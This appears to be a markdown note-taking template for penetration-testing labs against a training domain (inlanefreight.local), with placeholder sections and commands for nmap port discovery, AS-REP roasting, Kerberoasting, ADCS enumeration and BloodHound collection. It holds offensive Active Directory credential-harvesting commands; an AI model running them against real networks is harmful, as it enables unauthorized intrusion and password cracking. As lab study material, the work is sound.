# Lessons Learned - xxx --- # After-Action Attack Sequence - BLUF: xxx - xxx --- # Discover Ports & Services - `ping` test - `nmap` scan - light - create comma separated `ports.txt` ```bash cat nmap/light | grep -v "(\|nmap" | grep / | cut -d'/' -f 1 | sed -z 's/\n/,/g; s/,$/\n/' | tee ports.txt ``` - `nmap` scan - detailed - `nmap` scan - UDP --- # Service Enum ## Port 445 (SMB) ### Null Auth - xxx ### Shares - xxx ### Users - xxx ### Password Policy - xxx ## Port xxx (protocol): service_name ver. xxx - xxx --- # AD Enum ## ASREP Roasting ```bash nxc ldap TARGET -d inlanefreight.local -u users.txt -p '' --asreproast asrep.out ``` ## Kerberoasting ```bash nxc ldap TARGET -d inlanefreight.local -u username -p password --kerberoasting kerb.out ``` ## ADCS ```bash nxc ldap TARGET -d inlanefreight.local -u username -p password -M adcs certipy-ad find -target DC.FQDN -u username -p password ``` ## BloodHound - Run remote ingestor ```bash /opt/rusthound-ce -d inlanefreight.local -u inlanefreight@username -p password -z ``` - Spin up container for bloodhound GUI ```bash cd /opt/bloodhound docker compose up -d ``` --- # AD Attack Chain ___ # Revisit Service Enum